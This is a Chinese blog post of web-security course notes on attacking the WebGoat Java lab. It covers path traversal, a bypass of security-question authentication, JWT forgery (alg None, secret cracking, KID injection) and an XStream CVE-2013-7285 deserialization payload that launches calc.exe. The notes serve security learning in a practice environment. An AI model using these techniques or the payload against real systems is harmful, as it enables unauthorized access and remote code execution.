小迪安全21WEB 攻防-JavaWeb 项目&JWT 身份攻击&组件安全&访问控制

最新推荐文章于 2024-06-05 16:37:57 发布
最新推荐文章于 2024-06-05 16:37:57 发布
阅读量1.3k 收藏 16
点赞数 18
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73760178/article/details/135834197
版权

#知识点:

1JavaWeb 常见安全及代码逻辑

2、目录遍历&身份验证&逻辑&JWT

3、访问控制&安全组件&越权&三方组件

Java:大部分都是第三方插件出现漏洞

webgoat的搭建:——java靶场

JDK版本要求:11.0以上

需先启动webgoat-server:java -jar webgoat-server-8.1.0.jar --server.port=8080

然后访问http://127.0.0.1:8080/WebGoat,进行登录/创建

账号:atwood

Pw:123456

通过路径注入进行说明

本题只:需上传图片,路径需要再指定的路径下

通过直接上传,得知,上传的文件位置

通过bp进行抓包

通过对应的url中的地址,找到对应的文件

.jar:也是一个封装模式

通过反编译,可以获得从中的文件

先看文件中的配置文件

再看包,找到对映的包,点击添加到库,即将包解压开

找到配置文件,发现与POST中的地址一样,因此可知道此页面为数据文件

对数据的操作的代码

查看bp,进行对照

再根据直接上传的文件进行分析得知,我们输入的Fullname会直接为文件名进行上传,若要上传到指定的文件位置的话,可以进行数据更改

更改成功,因此完成本题要求

需要往前进2个文件../test

还有些对其进行了一定的过滤

可通过双写绕过等

身份验证

根据POST中的文件路径进行查找

验证结果(静态)

分析:

验证问题:

Question1:xxx?

Question2:xxx?

以字典的形式进行传送,接收键名 键值

即:question1=xx&question2=xx——先是键名正确,后键值正确——验证成功

固定的接受数据:question1、question2判断验证数据

不固定的:

写入问题本身以外的:

Question3=xxx&Question4=xxx——不存在

数据库会判断他们为question3=null&question4=null

若数据库没有对数据值为null进行异常捕获,则会直接通过

正常输入

进行参数更改

通过

JWT缺陷

Json web令牌进行身份验证——通常是对JAVA、Python的web应用程序进行运用

https://www.cnblogs.com/yokan/p/14468030.html

jwt由三个部分组成:header.payload.signature

如果判断网站用JWT进行验证

通过bp抓取数据包,看Cookie头,由.连接的三段字符串组成。

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.

eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ

.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

以base64加密

解密地址:JSON Web Tokens - jwt.io

若要成为管理员账户,则需对admin的值改为true,并加密将此值放到bp中替换掉以前的参数——这种思路是不对的,要考虑到签名之类的

攻击方式一:

空密钥算法破解:

将对alg的值改为None,即让此算法失效,只有两段有效字符串(header+'.'+payload,去掉了'.'+signature字段)

JWT是支持None值的,一般都用来进行调试。

生成字符串:算法模式+密匙

每一个字符串的生成都会伴随着一些密钥、签名等,所以如果我们直接对admin的值进行更改,是改不成的,因为我们没有密钥;那么我们可以不要密钥去生成,需要服务器的支持,这就是空密钥算法加密

如何判断服务器是否支持空密钥呢?

Bp抓包,查后端文件,进行分析

最后对alg值设为None,admin值为true,再进行base64加密

2.爆破

对JWT解析

得到后,发现密钥是不知道的,只有找到了正确的密钥,字符串生成才是正确的

利用相关工具进行破解(一般是字典爆破):

a.一个脚本

b.相关工具:c-jwt-cracker

破解之后,

查看文件中显示已经设置好的算法密钥

c.KID攻击

Kid是JWT header中的一个可选参数,用于指定加密算法的密钥

从而暴漏出了三个漏洞安全:

A.任意文件读取

B.SQL注入

C.命令注入

https://www.cnblogs.com/HAN91/p/14585449.html

安全组件:

组件:java库和JavaScript库等

通过bp抓包,查找对应的文件位置

查看对应的组件:

判断是第三方库还是java自身的库

1.这种就明显为java自身的库了

2.这种则为第三方库

查看第三方库,收集信息

查到历史漏洞

CVE 2013-7285 Poc——对其漏洞进行利用:对此服务器进行植入木马

<sorted-set>

<string>foo</string>

<dynamic-proxy>

<interface>java.lang.Comparable</interface>

<handler class="java.beans.EventHandler">

<target class="java.lang.ProcessBuilder">

<command>

<string>calc.exe</string> ——启动服务器的计算器

</command>

</target>

<action>start</action>

</handler>

</dynamic-proxy>

</sorted-set>

如:最近的Log4j2

访问控制:

-隐藏属性:前端页面的自卫限制显示

-水平越权:同一级别用户权限的查看

Java通常都是爆中低危的漏洞

yiqiqukanhaiba
关注
  • 18
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web攻防--JAVAWEB项目&JWT身份攻击&组件安全&Python考点&CTF与CMS-SSTI模版注入&PYC反编译
weixin_68243135的博客
11-15 492
WEB攻防--JWT--JAVAWEB项目--SSTI模板注入
小迪网络安全课件.txt
07-29
自己找的小迪网安课件,跟逆风微笑的代码狗上传的视频相配套,有需要的可以下载。
[BT]小迪安全2023学习笔记(第21天:Web攻防-JWT
Bluetuan的博客
03-09 413
JWT是一种紧凑且自包含的方式,用于在网络上安全地传输信息作为JSON对象。这些信息可以被验证和信任,因为它们是数字签名的。这个示例可以分为三个部分,由两个点(: 描述JWT的元数据,比如使用的算法(例如:HS256)。: 包含所要传递的数据,它可以包含多个预定义的声明或我们添加的自定义声明。: 通过将前两部分的编码字符串用密钥进行签名生成,以验证消息的发送者和确保消息在传输过程中未被篡改。
小迪安全2023】第21天:WEB攻防-JavaWeb项目&UWT身份攻击&组件安全&访问控制;第22天:WEB攻防-JS项目&Node.JS框架安全&识别审计&验证绕过
人若无名,便可专心练剑
04-12 1262
在Javascript中也存在变量和函数,当存在可控变量及函数调用即可参数漏洞JS开发的WEB应用和PHP,JAVA,NET等区别在于即没有源代码,也可以通过浏览器的查看源代码获取真实的点。所以相当于JS开发的NEB应用属于白盒测试(默认有源码参考)可以通过安装这个插件——wappalyzer,直接Google插件里面搜素。
小迪安全》第21天 文件上传:后端黑白名单绕过
m0_56250796的博客
11-07 261
首先作者先判断我们用POST方式提交(标签名为submit)的变量是否存在,如果存在,则接下来判断upload这个文件夹是否存在,如果存在则继续判断我们上传文件的文件类型,如果其文件类型为image/jpeg或者为image/png或者为image/gif,那么让temp_file这个变量获取存储在服务器中文件的临时名称,然后让img_path这个变量为upload+/+被上传文件的名称。如果在上传文件的后缀名里面加上空格,匹配到的含空格的字符串就在黑名单之外,就可以成功进行上传。
小迪安全学习笔记--第21天:web漏洞-文件上传之后端黑白名单绕过
zr1213159840的博客
12-18 868
文件上传的常见验证 后缀名的黑白名单 黑名单:明确哪些文件是不允许上传的,比如asp php jsp aspx cgi war等等。 白名单:明确可以上传的文件,比如jpg png zip rar gif 文件类型:MIME信息 浏览器中的header中有content-type,这就是MIME信息 文件头:内容头信息 文件的头信息,用于指明文件是什么格式 uploads过关记录 第一关:前端判断注释掉过关 第二关:修改MIME过关 第三关:上传php的其他格式来绕过 第四关:.htaccess绕过,只
2021-09-06
qq_2604939074的博客
09-06 301
基础入门-数据包拓展 HTTP/HTTPS 具体区别?(Https更加安全) Request 请求数据包数据格式 1.请求行:请求类型/请求资源路径、协议的版本和类型 2.请求头:一些键值对,浏览器与web 服务器之间都可以发送,特定的某种含义 3.空行:请求头与请求体之间用一个空行隔开; 4.请求体:要发送的数据(一般post 提交会使用);例:user=123&pass=123 请求行:请求行由三个标记组成:请求方法、请求URL 和HTTP 版本,它们用空格分享。 例如:GET /in
day21 JavaWeb项目&JWT身份攻击&组件安全&访问控制
wanjia01的博客
10-15 1108
小迪学习笔记,迪总yyds
第二十一天:WEB攻防-JavaWeb项目&JWT身份攻击&组件安全&访问控制
m0_51322401的博客
01-15 277
搭建使用教程请查看以下这篇文章其中需要注意的是,在用bf抓包的过程之中,火狐会对其中127.0.0.1这个还有localhost这两个限制,只需要将其修改完成后方可搭建完成后进入各个关卡如图然后将其该文件解压打开idea,然后将其全部拖入idea中当然有些文件打不开,可以先增加为库,便可打开对文件一一查看,寻找。
21Web攻防——JavaWeb项目&JWT身份攻击&组件安全&访问控制
qq_55202378的博客
12-20 213
JWT全称为Json Web Token,它遵循JSON格式,将用户信息加密到token里,服务端不保存用户信息,只保存密钥信息。在收到客户端的token后,使用密钥对加密后的token进行解密以验证用户身份。)入手,对比不同用户请求时的cookie,来判断是否使用JWT技术。burp抓包,在cookie字段会看到JWT特有的三段式字符串,分别为。就是刚刚请求的文件,怎么请求?为文件名的jar包,右键将其加入到库(也就是解压该jar包)。网站根目录不会限制脚本文件的执行,限制了,网站就会执行不起来。
WEB攻防-JavaWeb项目
qq_44867432的博客
01-13 2567
WEB攻防-JavaWeb项目&JWT身份攻击&组件安全&访问控制 #知识点: 1、JavaWeb常见安全及代码逻辑 2、目录遍历&身份验证&逻辑&JWT 3、访问控制&安全组件&越权&三方组件
课设&大作业&毕设-JavaWeb项目源码
04-19
2、适用人群:主要针对计算机相关专业(如计科、信息安全、数据科学与大数据技术、人工智能、通信、物联网、数学、电子信息等)的同学或企业员工下载使用,具有较高的学习借鉴价值。 3、不仅适合小白学习实战练习,也...
校园帮项目源码-毕业设计课程设计-采用javaWeb&SSM架构.zip
08-30
校园帮项目源码-毕业设计课程设计-采用javaWeb&SSM架构.zip校园帮项目源码-毕业设计课程设计-采用javaWeb&SSM架构.zip校园帮项目源码-毕业设计课程设计-采用javaWeb&SSM架构.zip校园帮项目源码-毕业设计课程设计-...
小迪安全】upload-labs 1-21(除了19)(白盒)
konglongwu的博客
03-15 4197
小迪安全】upload-labs 1-11(白盒) 目录【小迪安全】upload-labs 1-11(白盒)Pass-01(前端白名单)题解Pass-02(MIME类型)题解Pass-03(黑名单,其他可以解析成php的后缀)题解Pass-04(黑名单,.htaccess解析)题解Pass-05(黑名单,一次过滤,.user.ini)题解Pass-06(黑名单,大小写)题解Pass-07(黑名单,空格绕过)题解Pass-08(黑名单,点绕过)题解Pass-09(黑名单,::$DATA)题解Pass-10(
渗透学习 -21- WEB 攻防-JavaWeb 项目&JWT 身份攻击&组件安全&访问控制
2301_78897940的博客
03-28 191
简单来说,这里总共只有3个选项,参数Q100 Q99是不存在的,如果我抓包修改传递的内容为 Q100=&Q99= , 也就是 Q100=NULL Q99 =NULL,因为Q100 Q99本来就为空, 就有可能能够绕过验证。和ThinkPHP框架要求的知识点类似,那就是能够通过 URL 找到对应的文件。Q1 - 你的宠物叫什么名字?Q3 - 你的小学名字?2、目录遍历&身份验证&逻辑&JWT。Q2 - 你的父母名字?3、访问控制&安全组件&越权&三方组。网站在验证信息的时候可能采取的是。
小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训笔记(WEB攻防18-23)
qq_46343633的博客
11-29 988
1、ASP环境搭建组合2、ASP-数据库下载&植入3、IIS-短文件&解析&写权限WEB安全攻防:1、Weo源码2、开发语言3、中间件平台4、数据库类型4、第三方插件或软件。
安全生产月”专题报道:AI智能监控技术如何助力安全生产
TSINGSEE青犀视频官方技术博客
06-04 892
方案能够通过对人员行为的识别和分析,判断是否存在安全隐患。这些功能的实现,有助于企业提高安全管理水平,减少因人为因素导致的安全事故。
应用程序加固的优势及其在移动应用安全中的重要性
最新发布
gulu230220的博客
06-05 374
通过提升应用程序的安全性、防止应用程序被篡改、提高应用程序的抗攻击能力、保护应用程序的知识产权和提升用户体验和信任度,加固技术可以有效保障移动应用的安全和稳定,为用户提供更加安全和可靠的移动应用服务。通过加固应用程序的安全漏洞和弱点,加固技术可以防止黑客利用已知的攻击手段和工具对应用程序进行攻击,提高应用程序的安全性和稳定性。通过加密和混淆应用程序的源代码和关键算法,加固技术可以防止黑客和竞争对手获取应用程序的源代码和商业机密,保护开发者的创新成果和商业利益。应用程序加固能够有效提升移动应用程序的安全性。
java ee项目目录结构_JavaWeb-JavaWeb项目标准目录结构
05-18
Java EE 项目的目录结构可以根据具体的需求进行灵活设计,但一般情况下,推荐使用以下的标准目录结构: ``` project ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ └── example │...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值